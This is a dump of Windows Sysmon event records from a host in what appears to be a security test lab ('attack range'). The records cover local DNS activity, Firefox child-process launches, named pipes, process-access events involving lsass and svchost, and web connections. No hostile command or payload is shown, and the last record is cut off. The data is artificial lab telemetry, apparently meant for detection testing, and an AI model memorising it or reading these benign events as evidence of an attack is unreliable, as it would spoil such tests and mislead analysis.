354300x8000000000000000288528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.925{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56078- 354300x8000000000000000288527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.919{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50871- 354300x8000000000000000288526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.919{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58516- 10341000x8000000000000000288525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.494{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.493{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.484{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.483{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:32.459{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-6C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:32.459{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-6C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.446{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.443{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:32.442{C8EA50B7-11AC-6216-1705-000000003802}5396\chrome.2228.15.169176129C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:32.441{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.15.169176129C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.440{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e4a5b|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:32.440{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.14.48421159C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.436{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:32.435{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 354300x8000000000000000288511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.771{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53477-false104.18.25.243-80http 354300x8000000000000000288510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.745{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53476-false104.111.246.93a104-111-246-93.deploy.static.akamaitechnologies.com443https 354300x8000000000000000288509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.738{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52338- 354300x8000000000000000288508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.737{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61393- 354300x8000000000000000288507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.733{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51387- 354300x8000000000000000288506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.686{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53475-false142.250.186.34fra24s04-in-f2.1e100.net443https 10341000x8000000000000000288505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.389{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e23ae1|C:\Program Files\Mozilla Firefox\xul.dll+e31d78|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+19c6153|C:\Program Files\Mozilla Firefox\xul.dll+168ec17|C:\Program Files\Mozilla Firefox\xul.dll+19eea33|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+18db08|C:\Program Files\Mozilla Firefox\xul.dll+18ca0f|C:\Program Files\Mozilla Firefox\xul.dll+43f0b91|C:\Program Files\Mozilla Firefox\xul.dll+445b03b|C:\Program Files\Mozilla Firefox\xul.dll+445be29|C:\Program Files\Mozilla Firefox\xul.dll+1f9ac83|C:\Program Files\Mozilla Firefox\firefox.exe+9dd0|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.388{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.381{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.381{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.381{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.380{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.380{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.380{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+30cfd|C:\Program Files\Mozilla Firefox\firefox.exe+2ff25|C:\Program Files\Mozilla Firefox\xul.dll+2052e4a|C:\Program Files\Mozilla Firefox\xul.dll+9962fe|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.380{C8EA50B7-11B4-6216-1E05-000000003802}3624C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.14.484211590\840081421" -childID 7 -isForBrowser -prefsHandle 4392 -prefMapHandle 4272 -prefsLen 6018 -prefMapSize 251484 -jsInitHandle 976 -jsInitLen 279340 -parentBuildID 20220216172458 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 3956 157eb85d448 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32LowMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000288496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.378{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.378{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.378{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.377{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 